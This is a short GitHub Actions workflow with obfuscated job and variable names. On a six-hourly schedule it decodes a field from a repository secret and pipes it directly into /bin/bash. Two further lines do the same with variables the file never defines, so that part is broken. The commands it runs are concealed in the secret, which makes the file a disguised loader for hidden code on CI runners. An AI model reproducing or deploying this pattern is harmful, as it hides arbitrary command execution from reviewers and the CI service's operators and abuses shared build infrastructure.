name: yubanzhi4980

on:
  workflow_dispatch:
  schedule:
    - cron: '30 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: yubanzhi4980
        env:
          pvesk554: ${{ secrets.pvesk554 }}
        run: |
          echo $pvesk554 | jq -r .gnx6639 | /bin/bash
          echo $u7 | jq -r .y340 | /bin/bash
          echo $t9247 | jq -r .elpgp71876 | /bin/bash

